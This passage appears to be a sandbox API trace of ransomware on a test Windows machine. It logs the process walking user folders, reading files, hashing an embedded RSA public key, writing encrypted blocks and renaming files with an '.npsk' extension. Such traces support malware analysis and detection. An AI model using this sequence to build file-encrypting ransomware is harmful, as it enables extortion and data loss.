KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.251] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.251] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0216.252] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.252] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.252] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.252] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.252] GetLastError () returned 0x0 [0216.253] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.253] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0216.253] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.253] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.253] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.253] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.254] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x13484, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.254] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.254] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.254] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.254] CloseHandle (hObject=0x61c) returned 1 [0216.255] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Y6zjlhJWSCzUXZzpeuR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\y6zjlhjwsczuxzzpeur.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Y6zjlhJWSCzUXZzpeuR.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\y6zjlhjwsczuxzzpeur.avi.npsk")) returned 1 [0216.256] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab4280, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0xfac5f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e2f9, ftLastWriteTime.dwLowDateTime=0xfac5f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e2f9, nFileSizeHigh=0x0, nFileSizeLow=0xe0c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZXxgGTUDA6xY.swf", cAlternateFileName="ZXXGGT~1.SWF")) returned 1 [0216.256] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZXxgGTUDA6xY.swf") returned=".swf" [0216.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZXxgGTUDA6xY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zxxggtuda6xy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.257] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=57545) returned 1 [0216.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.258] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe0a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.258] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.260] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xe0c9, lpOverlapped=0x0) returned 1 [0216.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.260] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.261] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.261] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.261] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.261] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.262] GetLastError () returned 0x0 [0216.262] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.262] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.262] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.262] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.262] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.262] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.263] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe0c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.263] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.263] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.263] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.263] CloseHandle (hObject=0x61c) returned 1 [0216.265] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZXxgGTUDA6xY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zxxggtuda6xy.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZXxgGTUDA6xY.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zxxggtuda6xy.swf.npsk")) returned 1 [0216.266] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab4280, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0xfac5f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e2f9, ftLastWriteTime.dwLowDateTime=0xfac5f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e2f9, nFileSizeHigh=0x0, nFileSizeLow=0xe0c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZXxgGTUDA6xY.swf", cAlternateFileName="ZXXGGT~1.SWF")) returned 0 [0216.266] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.266] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.266] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.266] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.266] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0216.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0216.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.267] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.267] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.267] PathFindFileNameW (pszPath="") returned="" [0216.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.267] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.267] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0216.267] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0216.267] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0216.267] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0216.267] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.267] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.267] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.267] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.267] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\") returned="MpV84iMo\\" [0216.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0216.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.267] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.268] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.268] PathFindFileNameW (pszPath="") returned="" [0216.268] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99640a00, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0x33d261a0, ftLastAccessTime.dwHighDateTime=0x1d5e716, ftLastWriteTime.dwLowDateTime=0x33d261a0, ftLastWriteTime.dwHighDateTime=0x1d5e716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.268] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99640a00, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0x33d261a0, ftLastAccessTime.dwHighDateTime=0x1d5e716, ftLastWriteTime.dwLowDateTime=0x33d261a0, ftLastWriteTime.dwHighDateTime=0x1d5e716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.268] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d204c50, ftCreationTime.dwHighDateTime=0x1d5e187, ftLastAccessTime.dwLowDateTime=0x864827e0, ftLastAccessTime.dwHighDateTime=0x1d5e11b, ftLastWriteTime.dwLowDateTime=0x864827e0, ftLastWriteTime.dwHighDateTime=0x1d5e11b, nFileSizeHigh=0x0, nFileSizeLow=0x1861d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4ughhITY.wav", cAlternateFileName="")) returned 1 [0216.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\4ughhITY.wav") returned=".wav" [0216.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\4ughhITY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\4ughhity.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.269] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=99869) returned 1 [0216.269] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.270] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x185f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.271] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.272] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1861d, lpOverlapped=0x0) returned 1 [0216.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.273] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.274] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.274] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.274] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.274] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.274] GetLastError () returned 0x0 [0216.274] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.274] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.274] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.274] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.274] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.274] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.275] SetFilePointerEx (in: hFile=0x61c, 